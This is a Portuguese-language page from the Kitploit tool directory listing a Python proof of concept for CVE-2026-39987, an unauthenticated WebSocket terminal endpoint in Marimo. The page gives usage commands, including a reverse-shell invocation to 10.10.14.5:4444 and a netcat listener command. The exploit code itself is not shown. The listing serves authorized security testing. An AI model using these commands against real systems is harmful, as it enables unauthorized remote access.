Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-39987_RCE_PoC — Prova de conceito em Python para CVE-2026-39987, explorando um endpoint de terminal WebSocket não autenticado para obter execução remota de comandos e acesso a shell reverso. | Kitploit
Ferramentas/GitHubGitHub/mfahdk/cve-2026-39987_rce_poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubmfahdk/cve-2026-39987_rce_poc

CVE-2026-39987_RCE_PoC

Prova de conceito em Python para CVE-2026-39987, explorando um endpoint de terminal WebSocket não autenticado para obter execução remota de comandos e acesso a shell reverso.

Ver Repositório
16há 20 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-39987 — PoC de RCE via WebSocket no Marimo

Prova de Conceito para CVE-2026-39987, demonstrando execução remota de comandos através do endpoint de terminal WebSocket vulnerável.

Aviso: Esta PoC destina-se apenas a testes de segurança autorizados e uso educacional. Utilize-a apenas contra sistemas que possui ou para os quais tem permissão explícita de teste.

Descrição

A vulnerabilidade permite que um utilizador não autenticado interaja com o endpoint de terminal WebSocket da aplicação e execute comandos remotamente.

A PoC liga-se a:

wss://<target>/terminal/ws

e demonstra a execução de comandos através da ligação WebSocket.

O alvo utilizado durante o desenvolvimento/teste desta PoC foi um ambiente de laboratório Hack The Box autorizado.

Requisitos

  • Python 3
  • websocket-client

Instale a biblioteca necessária:

pip3 install websocket-client

Utilização

python3 test.py <domain>

Exemplo:

python3 test.py somesite.com

A PoC estabelece a ligação WebSocket e executa um comando de teste.

Reverse Shell

A PoC também suporta uma opção de reverse shell:

python3 exploit.py <domain> --reverse-shell <IP> --port <PORT>

Exemplo:

python3 exploit.py somesite.com --reverse-shell 10.10.14.5 --port 4444

Inicie o listener antes de executar a PoC:

nc -lvnp 4444

Detalhes Técnicos

A aplicação expõe um endpoint de terminal WebSocket sem exigir autenticação.

A PoC:

  1. Estabelece uma ligação WebSocket.
  2. Desativa a verificação do certificado TLS porque o alvo do laboratório utiliza um certificado autoassinado.
  3. Consome o prompt inicial do terminal.
  4. Envia um comando através do WebSocket.
  5. Lê a saída resultante do terminal.

O ws.recv() inicial é importante porque o servidor envia o prompt da shell imediatamente após estabelecer a ligação.

Baixar ferramenta